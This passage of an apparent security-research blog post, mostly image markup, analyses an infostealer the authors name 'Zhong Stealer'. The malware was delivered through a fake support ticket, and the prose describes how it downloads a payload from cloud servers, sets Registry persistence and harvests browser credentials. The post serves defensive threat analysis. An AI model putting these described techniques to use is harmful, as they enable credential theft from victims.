https://substackcdn.com/image/fetch/$s_!36vO!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F915d56e9-2a44-4839-a8c1-e654e2d9dfb2_1856x818.heic 848w, https://substackcdn.com/image/fetch/$s_!36vO!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F915d56e9-2a44-4839-a8c1-e654e2d9dfb2_1856x818.heic 1272w, https://substackcdn.com/image/fetch/$s_!36vO!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F915d56e9-2a44-4839-a8c1-e654e2d9dfb2_1856x818.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!36vO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F915d56e9-2a44-4839-a8c1-e654e2d9dfb2_1856x818.heic" width="1456" height="642" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/915d56e9-2a44-4839-a8c1-e654e2d9dfb2_1856x818.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:642,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:168793,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!36vO!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F915d56e9-2a44-4839-a8c1-e654e2d9dfb2_1856x818.heic 424w, https://substackcdn.com/image/fetch/$s_!36vO!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F915d56e9-2a44-4839-a8c1-e654e2d9dfb2_1856x818.heic 848w, https://substackcdn.com/image/fetch/$s_!36vO!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F915d56e9-2a44-4839-a8c1-e654e2d9dfb2_1856x818.heic 1272w, https://substackcdn.com/image/fetch/$s_!36vO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F915d56e9-2a44-4839-a8c1-e654e2d9dfb2_1856x818.heic 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Zhong samples containing Simplified and Traditional Chinese characters</figcaption></figure></div><p>So what are their intentions? Let&#8217;s find out, scalpel in hand.</p><div><hr></div><h2>&#24694;&#24847;&#36719;&#20214;</h2><p>We started with the basics: was anyone else targeted by this campaign? Surprisingly, the malware components had very few detections initially, as shown below.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Hyl_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93546b1-43f2-4f89-a4db-57cc5c82c38a_2624x862.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Hyl_!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93546b1-43f2-4f89-a4db-57cc5c82c38a_2624x862.heic 424w, https://substackcdn.com/image/fetch/$s_!Hyl_!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93546b1-43f2-4f89-a4db-57cc5c82c38a_2624x862.heic 848w, https://substackcdn.com/image/fetch/$s_!Hyl_!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93546b1-43f2-4f89-a4db-57cc5c82c38a_2624x862.heic 1272w, https://substackcdn.com/image/fetch/$s_!Hyl_!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93546b1-43f2-4f89-a4db-57cc5c82c38a_2624x862.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Hyl_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93546b1-43f2-4f89-a4db-57cc5c82c38a_2624x862.heic" width="1456" height="478" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f93546b1-43f2-4f89-a4db-57cc5c82c38a_2624x862.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:478,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:81296,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Hyl_!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93546b1-43f2-4f89-a4db-57cc5c82c38a_2624x862.heic 424w, https://substackcdn.com/image/fetch/$s_!Hyl_!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93546b1-43f2-4f89-a4db-57cc5c82c38a_2624x862.heic 848w, https://substackcdn.com/image/fetch/$s_!Hyl_!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93546b1-43f2-4f89-a4db-57cc5c82c38a_2624x862.heic 1272w, https://substackcdn.com/image/fetch/$s_!Hyl_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93546b1-43f2-4f89-a4db-57cc5c82c38a_2624x862.heic 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Over time, different strains of the malware (remember, we received three of them) began receiving more detections from various antivirus vendors.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!wRIX!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74e5acbb-5acc-4a5e-aa52-09b50609722a_2248x1686.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!wRIX!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74e5acbb-5acc-4a5e-aa52-09b50609722a_2248x1686.heic 424w, https://substackcdn.com/image/fetch/$s_!wRIX!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74e5acbb-5acc-4a5e-aa52-09b50609722a_2248x1686.heic 848w, https://substackcdn.com/image/fetch/$s_!wRIX!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74e5acbb-5acc-4a5e-aa52-09b50609722a_2248x1686.heic 1272w, https://substackcdn.com/image/fetch/$s_!wRIX!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74e5acbb-5acc-4a5e-aa52-09b50609722a_2248x1686.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!wRIX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74e5acbb-5acc-4a5e-aa52-09b50609722a_2248x1686.heic" width="1456" height="1092" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/74e5acbb-5acc-4a5e-aa52-09b50609722a_2248x1686.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1092,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:185635,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!wRIX!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74e5acbb-5acc-4a5e-aa52-09b50609722a_2248x1686.heic 424w, https://substackcdn.com/image/fetch/$s_!wRIX!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74e5acbb-5acc-4a5e-aa52-09b50609722a_2248x1686.heic 848w, https://substackcdn.com/image/fetch/$s_!wRIX!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74e5acbb-5acc-4a5e-aa52-09b50609722a_2248x1686.heic 1272w, https://substackcdn.com/image/fetch/$s_!wRIX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74e5acbb-5acc-4a5e-aa52-09b50609722a_2248x1686.heic 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p> However, all detections were labelled generically, without assigning a proper name.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!tINY!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8ca2a0c-2a86-4097-b1c0-43e411bb04a3_2634x1600.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!tINY!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8ca2a0c-2a86-4097-b1c0-43e411bb04a3_2634x1600.heic 424w, https://substackcdn.com/image/fetch/$s_!tINY!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8ca2a0c-2a86-4097-b1c0-43e411bb04a3_2634x1600.heic 848w, https://substackcdn.com/image/fetch/$s_!tINY!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8ca2a0c-2a86-4097-b1c0-43e411bb04a3_2634x1600.heic 1272w, https://substackcdn.com/image/fetch/$s_!tINY!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8ca2a0c-2a86-4097-b1c0-43e411bb04a3_2634x1600.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!tINY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8ca2a0c-2a86-4097-b1c0-43e411bb04a3_2634x1600.heic" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f8ca2a0c-2a86-4097-b1c0-43e411bb04a3_2634x1600.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:180359,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!tINY!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8ca2a0c-2a86-4097-b1c0-43e411bb04a3_2634x1600.heic 424w, https://substackcdn.com/image/fetch/$s_!tINY!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8ca2a0c-2a86-4097-b1c0-43e411bb04a3_2634x1600.heic 848w, https://substackcdn.com/image/fetch/$s_!tINY!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8ca2a0c-2a86-4097-b1c0-43e411bb04a3_2634x1600.heic 1272w, https://substackcdn.com/image/fetch/$s_!tINY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8ca2a0c-2a86-4097-b1c0-43e411bb04a3_2634x1600.heic 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Most of these names are heuristically generated, often appearing as placeholders like &#8220;<em>AIDetectMalware</em>,&#8221; &#8220;<em>Malware.AI</em>,&#8221; &#8220;<em>ML.Attribute.HighConfidence</em>,&#8221; &#8220;<em>malicious_confidence_90%</em>,&#8221; &#8220;<em>Static AI,</em>&#8221; or simply &#8220;<em>Generic</em>.&#8221; </p><p>These labels reveal little about the malware&#8217;s actual characteristics or behaviour. So, we took a closer look at the sample to give it a proper identity. We named it <strong>&#8220;&#20013;&#31363;&#32773;&#8221; (Zhong Stealer)</strong>. The word <em>zhong</em> means &#8220;central,&#8221; inspired by the original username from which we received the fake ticket.</p><p>Now, let&#8217;s dig deeper into its mechanics and see exactly how it works.</p><div><hr></div><h2><strong>Zhong Stealer (&#20013;&#31363;&#32773;)</strong></h2><p>The first thing our new friend will do in order to steal christmas is to download a new binary called &#8220;<em>down.exe</em>&#8221; from chinese servers hosted on <strong>Alibaba Cloud</strong>, along with a <em>DLL</em> library, a <em>LOG</em> file and a <em>TXT</em> file with mirrors just in case something goes bad acquiring the components. This process will then create a <em>BAT</em> file on the users temporary folder which will prepare the environment and communicate with a Hong Kong based server before continuing.</p><p>Then, the Christmas heist takes place. <strong>Zhong</strong> will start a recon routine on the system reading security settings, hostname, supported language (possibly to avoid attacking on specific regions), and then will add persistence via a Registry Key.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Pcgh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5e1ac0-e642-4e32-ba4b-14e62a7e790c_1446x1016.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Pcgh!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5e1ac0-e642-4e32-ba4b-14e62a7e790c_1446x1016.png 424w, https://substackcdn.com/image/fetch/$s_!Pcgh!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5e1ac0-e642-4e32-ba4b-14e62a7e790c_1446x1016.png 848w, https://substackcdn.com/image/fetch/$s_!Pcgh!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5e1ac0-e642-4e32-ba4b-14e62a7e790c_1446x1016.png 1272w, https://substackcdn.com/image/fetch/$s_!Pcgh!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5e1ac0-e642-4e32-ba4b-14e62a7e790c_1446x1016.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Pcgh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5e1ac0-e642-4e32-ba4b-14e62a7e790c_1446x1016.png" width="1446" height="1016" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/da5e1ac0-e642-4e32-ba4b-14e62a7e790c_1446x1016.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1016,&quot;width&quot;:1446,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:253573,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Pcgh!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5e1ac0-e642-4e32-ba4b-14e62a7e790c_1446x1016.png 424w, https://substackcdn.com/image/fetch/$s_!Pcgh!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5e1ac0-e642-4e32-ba4b-14e62a7e790c_1446x1016.png 848w, https://substackcdn.com/image/fetch/$s_!Pcgh!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5e1ac0-e642-4e32-ba4b-14e62a7e790c_1446x1016.png 1272w, https://substackcdn.com/image/fetch/$s_!Pcgh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5e1ac0-e642-4e32-ba4b-14e62a7e790c_1446x1016.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Persistence obtained via Registry Key</figcaption></figure></div><p>Then, it will start looking for credentials and sensitive data stored on browsers like Edge and Brave.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!lwNJ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb62628d5-0c20-4ffa-8be1-0382702c3ab2_1444x1012.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!lwNJ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb62628d5-0c20-4ffa-8be1-0382702c3ab2_1444x1012.png 424w, https://substackcdn.com/image/fetch/$s_!lwNJ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb62628d5-0c20-4ffa-8be1-0382702c3ab2_1444x1012.png 848w, https://substackcdn.com/image/fetch/$s_!lwNJ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb62628d5-0c20-4ffa-8be1-0382702c3ab2_1444x1012.png 1272w, https://substackcdn.com/image/fetch/$s_!lwNJ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb62628d5-0c20-4ffa-8be1-0382702c3ab2_1444x1012.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!lwNJ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb62628d5-0c20-4ffa-8be1-0382702c3ab2_1444x1012.png" width="1444" height="1012" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b62628d5-0c20-4ffa-8be1-0382702c3ab2_1444x1012.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1012,&quot;width&quot;:1444,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:298651,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" 